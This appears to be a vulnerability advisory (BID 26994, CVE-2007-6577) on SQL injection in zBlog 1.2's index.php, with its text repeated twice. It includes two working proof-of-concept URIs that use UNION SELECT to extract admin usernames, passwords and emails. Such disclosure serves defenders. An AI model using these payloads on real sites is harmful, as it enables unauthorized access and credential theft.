zBlog 'index.php' Multiple SQL Injection Vulnerabilities
BID:26994
Info
zBlog 'index.php' Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 26994 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-6577 |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 22 2007 12:00AM |
| Updated: | May 07 2015 05:34PM |
| Credit: | The H-T Team is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
z'Suite zBlog 1.2 |
| Not Vulnerable: | |
Discussion
zBlog 'index.php' Multiple SQL Injection Vulnerabilities
zBlog is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
These issues affect zBlog 1.2; other versions may also be affected.
zBlog is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
These issues affect zBlog 1.2; other versions may also be affected.
Exploit / POC
zBlog 'index.php' Multiple SQL Injection Vulnerabilities
Attackers may exploit these issues through a browser.
The following proof-of-concept URIs are available:
http://www.example.com/Path/index.php?page=categ&categ=-1%20union%20select%201,pseudo_admin,motdepasse_admin,4,5,6,7,8,9,10,11,12,13,14,15,16,email_admin%20from%20[table prefix]_admins--
http://www.example.com/Path/index.php?page=articles&article=-1%20union%20select%201,pseudo_admin,3,motdepasse_admin,5,6,7,8,9,10,11,12,13,14,15,16,17,email_admin%20from%20[table prefix]_admins--
Attackers may exploit these issues through a browser.
The following proof-of-concept URIs are available:
http://www.example.com/Path/index.php?page=categ&categ=-1%20union%20select%201,pseudo_admin,motdepasse_admin,4,5,6,7,8,9,10,11,12,13,14,15,16,email_admin%20from%20[table prefix]_admins--
http://www.example.com/Path/index.php?page=articles&article=-1%20union%20select%201,pseudo_admin,3,motdepasse_admin,5,6,7,8,9,10,11,12,13,14,15,16,17,email_admin%20from%20[table prefix]_admins--
Solution / Fix
zBlog 'index.php' Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].